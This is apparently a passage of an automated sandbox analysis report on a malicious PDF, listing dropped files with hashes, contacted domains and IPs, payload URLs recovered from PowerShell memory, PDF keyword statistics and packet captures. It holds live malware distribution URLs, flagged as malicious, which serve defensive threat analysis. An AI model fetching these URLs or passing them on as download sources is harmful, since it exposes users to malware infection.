SHA-256:	3594AD1C97697E6AFCB573EE6FB29714CE50AC9972313B78D5A44977454C13A9
SHA-512:	C001A8787893D64E8CE0C18C42DADDC386459D221143FB98F50E52F9B20B2BEDB15B63B9A211F62518F88F9CFB18D4753FE215A7D78B8B1238C3CC7469918F62
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdrk.dat
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	data
Size (bytes):	264
Entropy (8bit):	6.551488408015553
Encrypted:	false
MD5:	9F10A8354C59178E534C778CA653440F
SHA1:	355464F886C5BC112680481861A95BD6516F5ACA
SHA-256:	7326DE71C0F810E3041573E32528ED3C89837DAF8B9C4DEBF53922824CFBA719
SHA-512:	5FC631F6D59E9AC36E48EEFDA99EE7B3732E9AB8FDCA848573456844E13AAC46587E45CA0C197F701209D2D87A600C9E4A4139B7D0B0FB12BDC49DAFCEBC9947
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q3AU1PCEHCU892IRBZB4.temp
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.55279063877083
Encrypted:	false
MD5:	F0485F397BB12955B7C71FCA83750BF2
SHA1:	A533861EB4684D3EE62BCB8B06DE759E5C6DE6BD
SHA-256:	3C513A8A187D67D1BD17B48E829C8D4E5F0F48D48CA61DCF4786143384A4CC5F
SHA-512:	4DB2B99CDE22448DD7A3A56EB5B4416C2EF6E9C5A6AE9B39595699AD1025ABF4EA817A9F6647D4389262B29F0290AAA2BB8AFC09ABDDB393FAE08FB038FAF8AA
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SPZK66ENPUQVJSI4JUS5.temp
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.55279063877083
Encrypted:	false
MD5:	F0485F397BB12955B7C71FCA83750BF2
SHA1:	A533861EB4684D3EE62BCB8B06DE759E5C6DE6BD
SHA-256:	3C513A8A187D67D1BD17B48E829C8D4E5F0F48D48CA61DCF4786143384A4CC5F
SHA-512:	4DB2B99CDE22448DD7A3A56EB5B4416C2EF6E9C5A6AE9B39595699AD1025ABF4EA817A9F6647D4389262B29F0290AAA2BB8AFC09ABDDB393FAE08FB038FAF8AA
Malicious:	false

C:\Users\user\Favorites\Links\Suggested Sites.url
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://ieonline.microsoft.com/#ieslice>), ASCII text, with CRLF line terminators
Size (bytes):	776
Entropy (8bit):	4.961370100127045
Encrypted:	false
MD5:	14EB80973FB684D572509EAFF00C7D21
SHA1:	89C7036EF7090384941642E2C07D3DE63356FE56
SHA-256:	66037EEF1E17B2D8BFA5485BD219EEB217C3FCEF64294F280DC1B24C8430D6F6
SHA-512:	BC9A80A21490291A217A52A15FBBBEE798EF408ECF59EECE06A7FDCA5E7BDEAAE939FCEA715EEB73DC2805C33C702D04A48D230936A40D055C64340EE1B6976B
Malicious:	false

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sphinx-tour.com	107.180.48.109	true	true		unknown
avrasyaorganizasyon.net	89.19.30.15	true	false		low

Contacted URLs

Name	Malicious	Reputation
http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/US/	true	low
http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/US	true	low
http://sphinx-tour.com/my1fugwV	true	unknown
http://sphinx-tour.com/my1fugwV/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://secretariaextension.uH	powershell.exe, 0000000F.00000002.1055758629.01C00000.00000004.sdmp	false	unknown
http://nowley-rus.ru/administrator/cache/tguHgQZ	rsh.exe, 00000013.00000002.1066900722.00280000.00000004.sdmp, rsh.exe, 00000013.00000002.1066940490.00290000.00000004.sdmp, rsh.exe, 00000013.00000003.1064024692.002FE000.00000004.sdmp	true	unknown
http://sphinx-tour.com/my1fugwV/0k	powershell.exe, 0000000F.00000003.1049282284.04519000.00000004.sdmp	false	unknown
http://www.litespeedtech.com/error-page	US[1].htm.8.dr	false	high
http://sphinx-tour.com/my1fuH	powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	false	unknown
http://nowley-rus.ru/administrator/cache/tg	powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	true	unknown
http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I	rsh.exe, 00000013.00000002.1066900722.00280000.00000004.sdmp, rsh.exe, 00000013.00000002.1066940490.00290000.00000004.sdmp	true	low
http://www.microsoft.co	OSPPSVC.EXE, 0000000E.00000002.1072190378.003D8000.00000004.sdmp	false	high
http://licensing.micr	OSPPSVC.EXE, 0000000E.00000002.1072190378.003D8000.00000004.sdmp	false	high
http://sphinx-tour.com/my1fugwV$	powershell.exe, 0000000F.00000002.1060797524.04430000.00000004.sdmp	false	unknown
http://secretariaextension.unt.edu.ar/wp-content/	powershell.exe, 0000000F.00000002.1052722629.00285000.00000004.sdmp	true	low
http://nowley-rus.ru/administrator/cache/tguHgQZt	powershell.exe, 0000000F.00000002.1055758629.01C00000.00000004.sdmp	false	unknown
http://venturemeets.com/GeQdV4H	powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	false	unknown
http://secretariaextension.unt.edu.ar/wp-coH	powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	false	low
http://secretariaextension.unt.edu.ar/wp-content/00002/l24wot	powershell.exe, 0000000F.00000002.1055758629.01C00000.00000004.sdmp	false	low
http://venturemeets.com/Ge	powershell.exe, 0000000F.00000002.1050888827.001B0000.00000004.sdmp	true	unknown
http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/USRoot	{6C5EA244-F244-11E8-A8F7-B808CF8DE4F2}.dat.7.dr	false	low
http://egyptecotours.com/Aaw5tZ	rsh.exe, 00000013.00000002.1066900722.00280000.00000004.sdmp, rsh.exe, 00000013.00000002.1066940490.00290000.00000004.sdmp	true	unknown
http://sphinx-tour.com/my1fugwVr	powershell.exe, 0000000F.00000002.1052722629.00285000.00000004.sdmp	false	unknown
http://venturemeets.com/GeQH	powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	false	unknown
http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4IH	powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	false	low
http://sphinx-tour.com/my1fugwVV	powershell.exe, 0000000F.00000003.1049282284.04519000.00000004.sdmp	false	unknown
http://recentfiles.com.adobe.acrobat.extensions.files_description	UserCache.bin.2.dr	false	high
http://nowley-rus.ru/administrator/cache/tguHgQZH	powershell.exe, 0000000F.00000002.1055758629.01C00000.00000004.sdmp	false	unknown
http://sphinx-tour.com/my1fugwV_	powershell.exe, 0000000F.00000003.1049282284.04519000.00000004.sdmp	false	unknown
http://nowley-rus.ru/adminisH	powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	false	unknown
http://egyptecotours.com/Aaw5tZH	powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	false	unknown
http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/US)	DOC-642857352.pdf	false	low
http://recentfiles.	UserCache.bin.2.dr	false	high
http://sphinx-tour.com/my1fugwVH	powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	false	unknown
http://secretariaextension.unt.edu.ar/wp-content/00002/l24	powershell.exe, 0000000F.00000002.1058100601.0216D000.00000004.sdmp	true	low
http://venturemeets.com/GeQdV4	rsh.exe, 00000013.00000002.1066900722.00280000.00000004.sdmp, rsh.exe, 00000013.00000002.1066940490.00290000.00000004.sdmp, rsh.exe, 00000013.00000003.1064024692.002FE000.00000004.sdmp	true	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
89.19.30.15	Turkey		34619	CIZGITR	false
107.180.48.109	United States		26496	AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS	true

Static File Info

General
File type:	PDF document, version 1.3
Entropy (8bit):	7.950435083135229
TrID:	Adobe Portable Document Format (5005/1) 100.00%
File name:	DOC-642857352.pdf
File size:	17609
MD5:	bfd41dfe581773c453781ad7a2ff00aa
SHA1:	75c180c575d72dd7c1b06d723ef070e2e91d6f40
SHA256:	d742ce0096cd0d3b2c47063f9f33cb46ba085887bd7c084fda08235c4fa26d7e
SHA512:	71237f886240adf59ac8a5d54441370bdb2fe6489e25c43535988ce66acfe7870c7411b9dfb54dacdc59d14ee66c0c2549d5ae3581edf1cecefd7a8c2bd04fcf
File Content Preview:	%PDF-1.3.1 0 obj.<< /Type /Catalog./Outlines 2 0 R./Pages 3 0 R >>.endobj.2 0 obj.<< /Type /Outlines /Count 0 >>.endobj.3 0 obj.<< /Type /Pages./Kids [6 0 R.]./Count 1./Resources <<./ProcSet 4 0 R./Font << ./F1 8 0 R.>>.>>./MediaBox [0.000 0.000 612.000 7

File Icon

Static PDF Info

General
Header:	%PDF-1.3
Total Entropy:	7.950435
Total Bytes:	17609
Stream Entropy:	7.987071
Stream Bytes:	16268
Entropy outside Streams:	5.065606
Bytes outside Streams:	1341
Number of EOF found:	1
Bytes after EOF:

Keywords Statistics

Name	Count
obj	10
endobj	10
stream	1
endstream	1
xref	1
trailer	1
startxref	1
/Page	1
/Encrypt	0
/ObjStm	0
/URI	2
/JS	0
/JavaScript	0
/AA	0
/OpenAction	0
/AcroForm	0
/JBIG2Decode	0
/RichMedia	0
/Launch	0
/EmbeddedFile	0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2018 13:59:39.105878115 CET	54944	53	192.168.1.83	8.8.8.8
Nov 27, 2018 13:59:39.125358105 CET	53	54944	8.8.8.8	192.168.1.83
Nov 27, 2018 13:59:42.865458012 CET	49545	53	192.168.1.83	8.8.8.8
Nov 27, 2018 13:59:42.884984970 CET	53	49545	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:04.910667896 CET	63950	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:04.929493904 CET	53	63950	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:15.102777958 CET	52246	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:15.199184895 CET	53	52246	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:19.411190033 CET	51114	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:19.430835009 CET	53	51114	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:19.518877029 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:19.577672005 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:19.577763081 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:19.616616964 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:19.676503897 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:19.676536083 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:19.676552057 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:19.676635027 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:19.676923037 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:19.685821056 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:19.685919046 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:19.742096901 CET	55684	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:19.746854067 CET	61825	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:19.761619091 CET	53	55684	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:19.791261911 CET	53	61825	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:19.997206926 CET	56972	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:20.031719923 CET	53	56972	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:20.346589088 CET	49202	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.389978886 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.405811071 CET	80	49202	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.405900002 CET	49202	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.474472046 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.474504948 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.474524021 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.474545956 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.474606991 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.474853992 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.533267975 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.533298016 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.533396959 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.533451080 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.533485889 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.533492088 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.533509970 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.533529043 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.533543110 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.533548117 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.533802986 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.592807055 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.592839003 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.592865944 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.592892885 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.592902899 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.592912912 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.592931032 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.592952967 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.592972040 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.592991114 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.592991114 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.593012094 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.593031883 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.593085051 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.593107939 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.596991062 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.651649952 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651686907 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651705980 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651722908 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651741028 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651762962 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651779890 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651797056 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651813030 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651829958 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651849031 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651860952 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.651868105 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.651906967 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.651930094 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.651952028 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.655761957 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.655780077 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.655831099 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.655857086 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.655879021 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.655901909 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.655986071 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.656030893 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.656060934 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.656081915 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.656120062 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.656148911 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.656172991 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.656198025 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.656223059 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.656248093 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.656272888 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.656297922 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.657912016 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.657952070 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.710751057 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.710789919 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.710812092 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.710832119 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.710853100 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.710870028 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.710917950 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.710939884 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.710957050 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.710961103 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.710983038 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.710998058 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.711004019 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.711024046 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.711025953 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.711046934 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.711046934 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.711070061 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.711071014 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.711092949 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:20.711188078 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.711229086 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.711318970 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.711364985 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:20.801958084 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:21.861763954 CET	63945	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:21.881103992 CET	53	63945	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:21.922976017 CET	61988	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:21.942410946 CET	53	61988	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:26.640516043 CET	80	49201	89.19.30.15	192.168.1.83
Nov 27, 2018 14:00:26.640651941 CET	49201	80	192.168.1.83	89.19.30.15
Nov 27, 2018 14:00:45.618570089 CET	61340	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:45.637542963 CET	53	61340	8.8.8.8	192.168.1.83
Nov 27, 2018 14:01:06.223104000 CET	58816	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:01:06.257739067 CET	53	58816	8.8.8.8	192.168.1.83
Nov 27, 2018 14:01:06.311501026 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.430007935 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.430155993 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.432883978 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.552289009 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.553786993 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.553869009 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.571428061 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.730771065 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.767497063 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.767631054 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.768467903 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.768539906 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.769743919 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.769854069 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.771348953 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.771426916 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.773437977 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.773520947 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.773631096 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.773660898 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.773682117 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.773706913 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.774581909 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.774689913 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.775397062 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.775513887 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.801134109 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.892180920 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.892308950 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.892359972 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.892451048 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.892551899 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.892630100 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.892688990 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.892728090 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.892756939 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.892786980 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.892874002 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.892888069 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.892916918 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.892966032 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.893038034 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.893052101 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.893136978 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.893153906 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.893197060 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.893223047 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.893239021 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.893254995 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.893335104 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.893409014 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.893470049 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.893526077 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:06.893577099 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:06.894207954 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.010430098 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.010462999 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.010478020 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.010492086 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.010505915 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.010569096 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.010623932 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.010745049 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.010858059 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.010888100 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.010970116 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.011579990 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.011624098 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.011667967 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.011750937 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.011778116 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.011802912 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.011831045 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.011841059 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.011909008 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.011976957 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.011996984 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.012115002 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.012185097 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.012283087 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.012311935 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.012342930 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.012367964 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.012373924 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.012393951 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.012408018 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.013128042 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.013219118 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.013257027 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.013303041 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.128715992 CET	80	49209	107.180.48.109	192.168.1.83
